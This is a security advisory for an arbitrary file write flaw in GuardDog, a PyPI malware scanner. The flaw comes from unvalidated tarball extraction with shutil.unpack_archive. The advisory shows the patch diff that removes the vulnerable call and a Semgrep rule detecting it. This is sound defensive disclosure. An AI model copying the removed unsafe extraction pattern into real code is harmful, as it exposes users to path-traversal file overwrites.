GuardDog vulnerable to arbitrary file write when scanning a specially-crafted remote PyPI package
Description
GuardDog is a CLI tool to identify malicious PyPI packages. Versions prior to v0.1.8 are vulnerable to arbitrary file write when scanning a specially-crafted remote PyPI package. Extracting files using shutil.unpack_archive() from a potentially malicious tarball without validating that the destination file path is within the intended destination directory can cause files outside the destination directory to be overwritten. This issue is patched in version 0.1.8. Potential workarounds include using a safer module, like zipfile, and validating the location of the extracted files and discarding those with malicious paths.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
guarddogPyPI | < 0.1.8 | 0.1.8 |
Affected products
1Patches
137c7d0767ba2Securely extract PyPI .tar.gz archives (#102)
3 files changed · +36 −5
.github/semgrep-rules/insecure-unpack-archive.yml+21 −0 added@@ -0,0 +1,21 @@ +rules: + - id: insecure-shutil-unpack-archive-use + message: The Python 'shutil' shutil.extract_archive is vulnerable to + arbitrary file overwrites + languages: + - python + severity: ERROR + metadata: + category: security + technology: + - python + owasp: + - A06:2017 - Security Misconfiguration + - A05:2021 - Security Misconfiguration + cwe: + - "CWE-22: Improper Limitation of a Pathname to a Restricted Directory + ('Path Traversal')" + license: Commons Clause License Condition v1.0[LGPL-2.1-only] + pattern-either: + - pattern: | + shutil.unpack_archive(...) \ No newline at end of file
.github/workflows/semgrep.yml+9 −1 modified@@ -26,9 +26,17 @@ jobs: - uses: actions/checkout@v3 - run: semgrep --config auto --sarif --output semgrep.sarif ./guarddog + - run: semgrep --config .github/semgrep-rules --sarif --output semgrep-custom.sarif ./guarddog - name: Upload SARIF file for GitHub Advanced Security Dashboard uses: github/codeql-action/upload-sarif@v2 with: + category: semgrep-builtin sarif_file: semgrep.sarif - if: always() + + - name: Upload SARIF file for custom Semgrep rules for GitHub Advanced Security Dashboard + uses: github/codeql-action/upload-sarif@v2 + with: + category: semgrep-custom + sarif_file: semgrep-custom.sarif +
guarddog/scanners/package_scanner.py+6 −4 modified@@ -1,7 +1,6 @@ import json import os -import shutil -import tarsafe # type: ignore +import tarsafe # type:ignore import tempfile import requests @@ -160,5 +159,8 @@ def download_compressed(self, url, zippath, unzippedpath): with open(zippath, "wb") as f: f.write(response.raw.read()) - shutil.unpack_archive(zippath, unzippedpath) - os.remove(zippath) + if zippath.endswith('.tar.gz'): + tarsafe.open(zippath).extractall(unzippedpath) + os.remove(zippath) + else: + raise ValueError("unsupported archive extension: " + zippath)
Vulnerability mechanics
Generated by null/stub on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
6- github.com/advisories/GHSA-78m5-jpmf-ch7vghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2022-23530ghsaADVISORY
- github.com/DataDog/guarddog/blob/a1d064ceb09d39bb28deb6972bc0a278756ea91f/guarddog/scanners/package_scanner.pyghsax_refsource_MISCWEB
- github.com/DataDog/guarddog/commit/37c7d0767ba28f4df46117d478f97652594c491cghsax_refsource_MISCWEB
- github.com/DataDog/guarddog/security/advisories/GHSA-78m5-jpmf-ch7vghsax_refsource_CONFIRMWEB
- github.com/pypa/advisory-database/tree/main/vulns/guarddog/PYSEC-2022-42993.yamlghsaWEB
News mentions
0No linked articles in our index yet.